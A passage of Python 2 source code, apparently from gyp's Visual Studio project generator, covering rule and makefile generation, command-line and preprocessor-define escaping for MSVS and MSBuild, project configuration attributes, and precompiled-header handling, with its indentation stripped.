"""Find the inputs and outputs generated by a rule.
Arguments:
rule: the rule in question.
trigger_file: the main trigger for this rule.
Returns:
The pair of (inputs, outputs) involved in this rule.
"""
raw_inputs = _FixPaths(rule.get('inputs', []))
raw_outputs = _FixPaths(rule.get('outputs', []))
inputs = OrderedSet()
outputs = OrderedSet()
inputs.add(trigger_file)
for i in raw_inputs:
inputs.add(_RuleExpandPath(i, trigger_file))
for o in raw_outputs:
outputs.add(_RuleExpandPath(o, trigger_file))
return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
"""Generate a native rules file.
Arguments:
p: the target project
rules: the set of rules to include
output_dir: the directory in which the project/gyp resides
spec: the project dict
options: global generator options
"""
rules_filename = '%s%s.rules' % (spec['target_name'],
options.suffix)
rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
spec['target_name'])
# Add each rule.
for r in rules:
rule_name = r['rule_name']
rule_ext = r['extension']
inputs = _FixPaths(r.get('inputs', []))
outputs = _FixPaths(r.get('outputs', []))
# Skip a rule with no action and no inputs.
if 'action' not in r and not r.get('rule_sources', []):
continue
cmd = _BuildCommandLineForRule(spec, r, has_input_path=True,
do_setup_env=True)
rules_file.AddCustomBuildRule(name=rule_name,
description=r.get('message', rule_name),
extensions=[rule_ext],
additional_dependencies=inputs,
outputs=outputs,
cmd=cmd)
# Write out rules file.
rules_file.WriteIfChanged()
# Add rules file to project.
p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
sources, options, actions_to_add):
"""Generate an external makefile to do a set of rules.
Arguments:
rules: the list of rules to include
output_dir: path containing project and gyp files
spec: project specification data
sources: set of sources known
options: global generator options
actions_to_add: The list of actions we will add to.
"""
filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
# Find cygwin style versions of some paths.
mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
# Gather stuff needed to emit all: target.
all_inputs = OrderedSet()
all_outputs = OrderedSet()
all_output_dirs = OrderedSet()
first_outputs = []
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
all_inputs.update(OrderedSet(inputs))
all_outputs.update(OrderedSet(outputs))
# Only use one target from each rule as the dependency for
# 'all' so we don't try to build each rule multiple times.
first_outputs.append(list(outputs)[0])
# Get the unique output directories for this rule.
output_dirs = [os.path.split(i)[0] for i in outputs]
for od in output_dirs:
all_output_dirs.add(od)
first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
# Write out all: target, including mkdir for each output directory.
mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
for od in all_output_dirs:
if od:
mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
mk_file.write('\n')
# Define how each output is generated.
for rule in rules:
trigger_files = _FindRuleTriggerFiles(rule, sources)
for tf in trigger_files:
# Get all the inputs and outputs for this rule for this trigger file.
inputs, outputs = _RuleInputsAndOutputs(rule, tf)
inputs = [_Cygwinify(i) for i in inputs]
outputs = [_Cygwinify(i) for i in outputs]
# Prepare the command line for this rule.
cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
cmd = ['"%s"' % i for i in cmd]
cmd = ' '.join(cmd)
# Add it to the makefile.
mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
mk_file.write('\t%s\n\n' % cmd)
# Close up the file.
mk_file.close()
# Add makefile to list of sources.
sources.add(filename)
# Add a build action to call makefile.
cmd = ['make',
'OutDir=$(OutDir)',
'IntDir=$(IntDir)',
'-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
'-f', filename]
cmd = _BuildCommandLineForRuleRaw(spec, cmd, True, False, True, True)
# Insert makefile as 0'th input, so it gets the action attached there,
# as this is easier to understand from in the IDE.
all_inputs = list(all_inputs)
all_inputs.insert(0, filename)
_AddActionStep(actions_to_add,
inputs=_FixPaths(all_inputs),
outputs=_FixPaths(all_outputs),
description='Running external rules for %s' %
spec['target_name'],
command=cmd)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
"""Escapes a Windows command-line argument.
So that the Win32 CommandLineToArgv function will turn the escaped result back
into the original string.
See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
("Parsing C++ Command-Line Arguments") to understand why we have to do
this.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a literal quote, CommandLineToArgv requires an odd number of
# backslashes preceding it, and it produces half as many literal backslashes
# (rounded down). So we need to produce 2n+1 backslashes.
return 2 * match.group(1) + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex.sub(_Replace, s)
# Now add unescaped quotes so that any whitespace is interpreted literally.
s = '"' + s + '"'
return s
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
"""Escapes command line arguments for MSVS.
The VCProj format stores string lists in a single string using commas and
semi-colons as separators, which must be quoted if they are to be
interpreted literally. However, command-line arguments may already have
quotes, and the VCProj parser is ignorant of the backslash escaping
convention used by CommandLineToArgv, so the command-line quotes and the
VCProj quotes may not be the same quotes. So to store a general
command-line argument in a VCProj list, we need to parse the existing
quoting according to VCProj's convention and quote any delimiters that are
not already quoted by that convention. The quotes that we add will also be
seen by CommandLineToArgv, so if backslashes precede them then we also have
to escape those backslashes according to the CommandLineToArgv
convention.
Args:
s: the string to be escaped.
Returns:
the escaped string.
"""
def _Replace(match):
# For a non-literal quote, CommandLineToArgv requires an even number of
# backslashes preceding it, and it produces half as many literal
# backslashes. So we need to produce 2n backslashes.
return 2 * match.group(1) + '"' + match.group(2) + '"'
segments = s.split('"')
# The unquoted segments are at the even-numbered indices.
for i in range(0, len(segments), 2):
segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
# Concatenate back into a single string
s = '"'.join(segments)
if len(segments) % 2 == 0:
# String ends while still quoted according to VCProj's convention. This
# means the delimiter and the next list item that follow this one in the
# .vcproj file will be misinterpreted as part of this item. There is nothing
# we can do about this. Adding an extra quote would correct the problem in
# the VCProj but cause the same problem on the final command-line. Moving
# the item to the end of the list does works, but that's only possible if
# there's only one such item. Let's just warn the user.
print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
'quotes in ' + s)
return s
def _EscapeCppDefineForMSVS(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSVS(s)
s = _EscapeVCProjCommandLineArgListItem(s)
# cl.exe replaces literal # characters with = in preprocesor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
"""Escapes a Windows command-line argument for use by MSBuild."""
def _Replace(match):
return (len(match.group(1)) / 2 * 4) * '\\' + '\\"'
# Escape all quotes so that they are interpreted literally.
s = quote_replacer_regex2.sub(_Replace, s)
return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = _EscapeEnvironmentVariableExpansion(s)
s = _EscapeCommandLineArgumentForMSBuild(s)
s = _EscapeMSBuildSpecialCharacters(s)
# cl.exe replaces literal # characters with = in preprocesor definitions for
# some reason. Octal-encode to work around that.
s = s.replace('#', '\\%03o' % ord('#'))
return s
def _GenerateRulesForMSVS(p, output_dir, options, spec,
sources, excluded_sources,
actions_to_add):
"""Generate all the rules for a particular project.
Arguments:
p: the project
output_dir: directory to emit rules to
options: global options passed to the generator
spec: the specification for this project
sources: the set of all known source files in this project
excluded_sources: the set of sources excluded from normal processing
actions_to_add: deferred list of actions to add in
"""
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
# Handle rules that use a native rules file.
if rules_native:
_GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)
# Handle external rules (non-native rules).
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(spec, rules, sources, excluded_sources)
def _AdjustSourcesForRules(spec, rules, sources, excluded_sources):
# Add outputs generated by each rule (if applicable).
for rule in rules:
# Done if not processing outputs as sources.
if int(rule.get('process_outputs_as_sources', False)):
# Add in the outputs from this rule.
trigger_files = _FindRuleTriggerFiles(rule, sources)
for trigger_file in trigger_files:
inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
inputs = OrderedSet(_FixPaths(inputs))
outputs = OrderedSet(_FixPaths(outputs))
inputs.remove(_FixPath(trigger_file))
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
"""Take inputs with actions attached out of the list of exclusions.
Arguments:
excluded_sources: list of source files not to be built.
actions_to_add: dict of actions keyed on source file they're attached to.
Returns:
excluded_sources with files that have actions attached removed.
"""
must_keep = OrderedSet(_FixPaths(actions_to_add.keys()))
return [s for s in excluded_sources if s not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
"""Get the guid for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
Returns:
the guid.
Raises:
ValueError: if the specified GUID is invalid.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
# Decide the guid of the project.
guid = default_config.get('msvs_guid')
if guid:
if VALID_MSVS_GUID_CHARS.match(guid) is None:
raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
(guid, VALID_MSVS_GUID_CHARS.pattern))
guid = '{%s}' % guid
guid = guid or MSVSNew.MakeGuid(proj_path)
return guid
def _GetMsbuildToolsetOfProject(proj_path, spec, version):
"""Get the platform toolset for the project.
Arguments:
proj_path: Path of the vcproj or vcxproj file to generate.
spec: The target dictionary containing the properties of the target.
version: The MSVSVersion object.
Returns:
the platform toolset string or None.
"""
# Pluck out the default configuration.
default_config = _GetDefaultConfiguration(spec)
toolset = default_config.get('msbuild_toolset')
if not toolset and version.DefaultToolset():
toolset = version.DefaultToolset()
return toolset
def _GenerateProject(project, options, version, generator_flags):
"""Generates a vcproj file.
Arguments:
project: the MSVSProject object.
options: global generator options.
version: the MSVSVersion object.
generator_flags: dict of generator-specific flags.
Returns:
A list of source files that cannot be found on disk.
"""
default_config = _GetDefaultConfiguration(project.spec)
# Skip emitting anything if told to with msvs_existing_vcproj option.
if default_config.get('msvs_existing_vcproj'):
return []
if version.UsesVcxproj():
return _GenerateMSBuildProject(project, options, version, generator_flags)
else:
return _GenerateMSVSProject(project, options, version, generator_flags)
def _GenerateMSVSProject(project, options, version, generator_flags):
"""Generates a .vcproj file. It may create .rules and .user files too.
Arguments:
project: The project object we will generate the file for.
options: Global options passed to the generator.
version: The VisualStudioVersion object.
generator_flags: dict of generator-specific flags.
"""
spec = project.spec
gyp.common.EnsureDirExists(project.path)
platforms = _GetUniquePlatforms(spec)
p = MSVSProject.Writer(project.path, version, spec['target_name'],
project.guid, platforms)
# Get directory project file is in.
project_dir = os.path.split(project.path)[0]
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
config_type = _GetMSVSConfigurationType(spec, project.build_file)
for config_name, config in spec['configurations'].iteritems():
_AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)
# Prepare list of sources and excluded sources.
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
gyp_file)
# Add rules.
actions_to_add = {}
_GenerateRulesForMSVS(p, project_dir, options, spec,
sources, excluded_sources,
actions_to_add)
list_excluded = generator_flags.get('msvs_list_excluded_files', True)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options, project_dir,
sources, excluded_sources,
list_excluded, version))
# Add in files.
missing_sources = _VerifySourcesExist(sources, project_dir)
p.AddFiles(sources)
_AddToolFilesToMSVS(p, spec)
_HandlePreCompiledHeaders(p, sources, spec)
_AddActions(actions_to_add, spec, relative_path_of_gyp_file)
_AddCopies(actions_to_add, spec)
_WriteMSVSUserFile(project.path, version, spec)
# NOTE: this stanza must appear after all actions have been decided.
# Don't excluded sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
_ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded)
_AddAccumulatedActionsToMSVS(p, spec, actions_to_add)
# Write it out.
p.WriteIfChanged()
return missing_sources
def _GetUniquePlatforms(spec):
"""Returns the list of unique platforms for this spec, e.g ['win32', ...].
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
# Gather list of unique platforms.
platforms = OrderedSet()
for configuration in spec['configurations']:
platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
platforms = list(platforms)
return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
"""Generates a .user file for the user running this Gyp program.
Arguments:
proj_path: The path of the project file being created. The .user file
shares the same path (with an appropriate suffix).
version: The VisualStudioVersion object.
spec: The target dictionary containing the properties of the target.
Returns:
The MSVSUserFile object created.
"""
(domain, username) = _GetDomainAndUserName()
vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
user_file = MSVSUserFile.Writer(vcuser_filename, version,
spec['target_name'])
return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
}[spec['type']]
except KeyError:
if spec.get('type'):
raise GypError('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise GypError('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
"""Adds a configuration to the MSVS project.
Many settings in a vcproj file are specific to a configuration. This
function the main part of the vcproj file that's configuration specific.
Arguments:
p: The target project being generated.
spec: The target dictionary containing the properties of the target.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
config: The dictionary that defines the special processing to be done
for this configuration.
"""
# Get the information for this configuration
include_dirs, resource_include_dirs = _GetIncludeDirs(config)
libraries = _GetLibraries(spec)
library_dirs = _GetLibraryDirs(config)
out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec, msbuild=False)
defines = _GetDefines(config)
defines = [_EscapeCppDefineForMSVS(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(config)
prebuild = config.get('msvs_prebuild')
postbuild = config.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = config.get('msvs_precompiled_header')
# Prepare the list of tools as a dictionary.
tools = dict()
# Add in user specified msvs_settings.
msvs_settings = config.get('msvs_settings', {})
MSVSSettings.ValidateMSVSSettings(msvs_settings)
# Prevent default library inheritance from the environment.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', ['$(NOINHERIT)'])
for tool in msvs_settings:
settings = config['msvs_settings'][tool]
for setting in settings:
_ToolAppend(tools, tool, setting, settings[setting])
# Add the information to the appropriate tool
_ToolAppend(tools, 'VCCLCompilerTool',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(tools, 'VCResourceCompilerTool',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalDependencies', libraries)
_ToolAppend(tools, 'VCLinkerTool', 'AdditionalLibraryDirectories',
library_dirs)
if out_file:
_ToolAppend(tools, vc_tool, 'OutputFile', out_file, only_if_unset=True)
# Add defines.
_ToolAppend(tools, 'VCCLCompilerTool', 'PreprocessorDefinitions', defines)
_ToolAppend(tools, 'VCResourceCompilerTool', 'PreprocessorDefinitions',
defines)
# Change program database directory to prevent collisions.
_ToolAppend(tools, 'VCCLCompilerTool', 'ProgramDataBaseFileName',
'$(IntDir)$(ProjectName)\\vc80.pdb', only_if_unset=True)
# Add disabled warnings.
_ToolAppend(tools, 'VCCLCompilerTool',
'DisableSpecificWarnings', disabled_warnings)
# Add Pre-build.
_ToolAppend(tools, 'VCPreBuildEventTool', 'CommandLine', prebuild)
# Add Post-build.
_ToolAppend(tools, 'VCPostBuildEventTool', 'CommandLine', postbuild)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(tools, 'VCCLCompilerTool', 'UsePrecompiledHeader', '2')
_ToolAppend(tools, 'VCCLCompilerTool',
'PrecompiledHeaderThrough', precompiled_header)
_ToolAppend(tools, 'VCCLCompilerTool',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(tools, 'VCLinkerTool', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(tools, 'VCLinkerTool', 'ModuleDefinitionFile', def_file)
_AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name)
def _GetIncludeDirs(config):
"""Returns the list of directories to be used for #include directives.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
# TODO(bradnelson): include_dirs should really be flexible enough not to
# require this sort of thing.
include_dirs = (
config.get('include_dirs', []) +
config.get('msvs_system_include_dirs', []))
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
include_dirs = _FixPaths(include_dirs)
resource_include_dirs = _FixPaths(resource_include_dirs)
return include_dirs, resource_include_dirs
def _GetLibraryDirs(config):
"""Returns the list of directories to be used for library search paths.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of directory paths.
"""
library_dirs = config.get('library_dirs', [])
library_dirs = _FixPaths(library_dirs)
return library_dirs
def _GetLibraries(spec):
"""Returns the list of libraries for this configuration.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
The list of directory paths.
"""
libraries = spec.get('libraries', [])
# Strip out -l, as it is not used on windows (but is needed so we can pass
# in libraries that are assumed to be in the default library path).
# Also remove duplicate entries, leaving only the last duplicate, while
# preserving order.
found = OrderedSet()
unique_libraries_list = []
for entry in reversed(libraries):
library = re.sub('^\-l', '', entry)
if not os.path.splitext(library)[1]:
library += '.lib'
if library not in found:
found.add(library)
unique_libraries_list.append(library)
unique_libraries_list.reverse()
return unique_libraries_list
def _GetOutputFilePathAndTool(spec, msbuild):
"""Returns the path and tool to use for this target.
Figures out the path of the file this spec will create and the name of
the VC tool that will create it.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A triple of (file path, name of the vc tool, name of the msbuild tool)
"""
# Select a name for the output file.
out_file = ''
vc_tool = ''
msbuild_tool = ''
output_file_map = {
'executable': ('VCLinkerTool', 'Link', '$(OutDir)', '.exe'),
'shared_library': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'loadable_module': ('VCLinkerTool', 'Link', '$(OutDir)', '.dll'),
'static_library': ('VCLibrarianTool', 'Lib', '$(OutDir)lib\\', '.lib'),
}
output_file_props = output_file_map.get(spec['type'])
if output_file_props and int(spec.get('msvs_auto_output_file', 1)):
vc_tool, msbuild_tool, out_dir, suffix = output_file_props
if spec.get('standalone_static_library', 0):
out_dir = '$(OutDir)'
out_dir = spec.get('product_dir', out_dir)
product_extension = spec.get('product_extension')
if product_extension:
suffix = '.' + product_extension
elif msbuild:
suffix = '$(TargetExt)'
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
out_file = ntpath.join(out_dir, prefix + product_name + suffix)
return out_file, vc_tool, msbuild_tool
def _GetOutputTargetExt(spec):
"""Returns the extension for this target, including the dot
If product_extension is specified, set target_extension to this to avoid
MSB8012, returns None otherwise. Ignores any target_extension settings in
the input files.
Arguments:
spec: The target dictionary containing the properties of the target.
Returns:
A string with the extension, or None
"""
target_extension = spec.get('product_extension')
if target_extension:
return '.' + target_extension
return None
def _GetDefines(config):
"""Returns the list of preprocessor definitions for this configuation.
Arguments:
config: The dictionary that defines the special processing to be done
for this configuration.
Returns:
The list of preprocessor definitions.
"""
defines = []
for d in config.get('defines', []):
if type(d) == list:
fd = '='.join([str(dpart) for dpart in d])
else:
fd = str(d)
defines.append(fd)
return defines
def _GetDisabledWarnings(config):
return [str(i) for i in config.get('msvs_disabled_warnings', [])]
def _GetModuleDefinition(spec):
def_file = ''
if spec['type'] in ['shared_library', 'loadable_module', 'executable']:
def_files = [s for s in spec.get('sources', []) if s.endswith('.def')]
if len(def_files) == 1:
def_file = _FixPath(def_files[0])
elif def_files:
raise ValueError(
'Multiple module definition files in one target, target %s lists '
'multiple .def files: %s' % (
spec['target_name'], ' '.join(def_files)))
return def_file
def _ConvertToolsToExpectedForm(tools):
"""Convert tools to a form expected by Visual Studio.
Arguments:
tools: A dictionary of settings; the tool name is the key.
Returns:
A list of Tool objects.
"""
tool_list = []
for tool, settings in tools.iteritems():
# Collapse settings with lists.
settings_fixed = {}
for setting, value in settings.iteritems():
if type(value) == list:
if ((tool == 'VCLinkerTool' and
setting == 'AdditionalDependencies') or
setting == 'AdditionalOptions'):
settings_fixed[setting] = ' '.join(value)
else:
settings_fixed[setting] = ';'.join(value)
else:
settings_fixed[setting] = value
# Add in this tool.
tool_list.append(MSVSProject.Tool(tool, settings_fixed))
return tool_list
def _AddConfigurationToMSVS(p, spec, tools, config, config_type, config_name):
"""Add to the project file the configuration specified by config.
Arguments:
p: The target project being generated.
spec: the target project dict.
tools: A dictionary of settings; the tool name is the key.
config: The dictionary that defines the special processing to be done
for this configuration.
config_type: The configuration type, a number as defined by Microsoft.
config_name: The name of the configuration.
"""
attributes = _GetMSVSAttributes(spec, config, config_type)
# Add in this configuration.
tool_list = _ConvertToolsToExpectedForm(tools)
p.AddConfig(_ConfigFullName(config_name, config),
attrs=attributes, tools=tool_list)
def _GetMSVSAttributes(spec, config, config_type):
# Prepare configuration attributes.
prepared_attrs = {}
source_attrs = config.get('msvs_configuration_attributes', {})
for a in source_attrs:
prepared_attrs[a] = source_attrs[a]
# Add props files.
vsprops_dirs = config.get('msvs_props', [])
vsprops_dirs = _FixPaths(vsprops_dirs)
if vsprops_dirs:
prepared_attrs['InheritedPropertySheets'] = ';'.join(vsprops_dirs)
# Set configuration type.
prepared_attrs['ConfigurationType'] = config_type
output_dir = prepared_attrs.get('OutputDirectory',
'$(SolutionDir)$(ConfigurationName)')
prepared_attrs['OutputDirectory'] = _FixPath(output_dir) + '\\'
if 'IntermediateDirectory' not in prepared_attrs:
intermediate = '$(ConfigurationName)\\obj\\$(ProjectName)'
prepared_attrs['IntermediateDirectory'] = _FixPath(intermediate) + '\\'
else:
intermediate = _FixPath(prepared_attrs['IntermediateDirectory']) + '\\'
intermediate = MSVSSettings.FixVCMacroSlashes(intermediate)
prepared_attrs['IntermediateDirectory'] = intermediate
return prepared_attrs
def _AddNormalizedSources(sources_set, sources_array):
sources_set.update(_NormalizedSource(s) for s in sources_array)
def _PrepareListOfSources(spec, generator_flags, gyp_file):
"""Prepare list of sources and excluded sources.
Besides the sources specified directly in the spec, adds the gyp file so
that a change to it will cause a re-compile. Also adds appropriate sources
for actions and copies. Assumes later stage will un-exclude files which
have custom build steps attached.
Arguments:
spec: The target dictionary containing the properties of the target.
gyp_file: The name of the gyp file.
Returns:
A pair of (list of sources, list of excluded sources).
The sources will be relative to the gyp file.
"""
sources = OrderedSet()
_AddNormalizedSources(sources, spec.get('sources', []))
excluded_sources = OrderedSet()
# Add in the gyp file.
if not generator_flags.get('standalone'):
sources.add(gyp_file)
# Add in 'action' inputs and outputs.
for a in spec.get('actions', []):
inputs = a['inputs']
inputs = [_NormalizedSource(i) for i in inputs]
# Add all inputs to sources and excluded sources.
inputs = OrderedSet(inputs)
sources.update(inputs)
if not spec.get('msvs_external_builder'):
excluded_sources.update(inputs)
if int(a.get('process_outputs_as_sources', False)):
_AddNormalizedSources(sources, a.get('outputs', []))
# Add in 'copies' inputs and outputs.
for cpy in spec.get('copies', []):
_AddNormalizedSources(sources, cpy.get('files', []))
return (sources, excluded_sources)
def _AdjustSourcesAndConvertToFilterHierarchy(
spec, options, gyp_dir, sources, excluded_sources, list_excluded, version):
"""Adjusts the list of sources and excluded sources.
Also converts the sets to lists.
Arguments:
spec: The target dictionary containing the properties of the target.
options: Global generator options.
gyp_dir: The path to the gyp file being processed.
sources: A set of sources to be included for this project.
excluded_sources: A set of sources to be excluded for this project.
version: A MSVSVersion object.
Returns:
A trio of (list of sources, list of excluded sources,
path of excluded IDL file)
"""
# Exclude excluded sources coming into the generator.
excluded_sources.update(OrderedSet(spec.get('sources_excluded', [])))
# Add excluded sources into sources for good measure.
sources.update(excluded_sources)
# Convert to proper windows form.
# NOTE: sources goes from being a set to a list here.
# NOTE: excluded_sources goes from being a set to a list here.
sources = _FixPaths(sources)
# Convert to proper windows form.
excluded_sources = _FixPaths(excluded_sources)
excluded_idl = _IdlFilesHandledNonNatively(spec, sources)
precompiled_related = _GetPrecompileRelatedFiles(spec)
# Find the excluded ones, minus the precompiled header related ones.
fully_excluded = [i for i in excluded_sources if i not in precompiled_related]
# Convert to folders and the right slashes.
sources = [i.split('\\') for i in sources]
sources = _ConvertSourcesToFilterHierarchy(sources, excluded=fully_excluded,
list_excluded=list_excluded,
msvs_version=version)
# Prune filters with a single child to flatten ugly directory structures
# such as ../../src/modules/module1 etc.
while len(sources) == 1 and isinstance(sources[0], MSVSProject.Filter):
sources = sources[0].contents
return sources, excluded_sources, excluded_idl
def _IdlFilesHandledNonNatively(spec, sources):
# If any non-native rules use 'idl' as an extension exclude idl files.
# Gather a list here to use later.
using_idl = False
for rule in spec.get('rules', []):
if rule['extension'] == 'idl' and int(rule.get('msvs_external_rule', 0)):
using_idl = True
break
if using_idl:
excluded_idl = [i for i in sources if i.endswith('.idl')]
else:
excluded_idl = []
return excluded_idl
def _GetPrecompileRelatedFiles(spec):
# Gather a list of precompiled header related sources.
precompiled_related = []
for _, config in spec['configurations'].iteritems():
for k in precomp_keys:
f = config.get(k)
if f:
precompiled_related.append(_FixPath(f))
return precompiled_related
def _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
list_excluded):
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
for file_name, excluded_configs in exclusions.iteritems():
if (not list_excluded and
len(excluded_configs) == len(spec['configurations'])):
# If we're not listing excluded files, then they won't appear in the
# project, so don't try to configure them to be excluded.
pass
else:
for config_name, config in excluded_configs:
p.AddFileConfig(file_name, _ConfigFullName(config_name, config),
{'ExcludedFromBuild': 'true'})
def _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl):
exclusions = {}
# Exclude excluded sources from being built.
for f in excluded_sources:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
precomped = [_FixPath(config.get(i, '')) for i in precomp_keys]
# Don't do this for ones that are precompiled header related.
if f not in precomped:
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
# If any non-native rules use 'idl' as an extension exclude idl files.
# Exclude them now.
for f in excluded_idl:
excluded_configs = []
for config_name, config in spec['configurations'].iteritems():
excluded_configs.append((config_name, config))
exclusions[f] = excluded_configs
return exclusions
def _AddToolFilesToMSVS(p, spec):
# Add in tool files (rules).
tool_files = OrderedSet()
for _, config in spec['configurations'].iteritems():
for f in config.get('msvs_tool_files', []):
tool_files.add(f)
for f in tool_files:
p.AddToolFile(f)
def _HandlePreCompiledHeaders(p, sources, spec):
# Pre-compiled header source stubs need a different compiler flag
# (generate precompiled header) and any source file not of the same
# kind (i.e. C vs. C++) as the precompiled header source stub needs
# to have use of precompiled headers disabled.
extensions_excluded_from_precompile = []
for config_name, config in spec['configurations'].iteritems():
source = config.get('msvs_precompiled_source')
if source:
source = _FixPath(source)
# UsePrecompiledHeader=1 for if using precompiled headers.
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '1'})
p.AddFileConfig(source, _ConfigFullName(config_name, config),
{}, tools=[tool])
basename, extension = os.path.splitext(source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
def DisableForSourceTree(source_tree):
for source in source_tree:
if isinstance(source, MSVSProject.Filter):
DisableForSourceTree(source.contents)
else:
basename, extension = os.path.splitext(source)
if extension in extensions_excluded_from_precompile:
for config_name, config in spec['configurations'].iteritems():
tool = MSVSProject.Tool('VCCLCompilerTool',
{'UsePrecompiledHeader': '0',
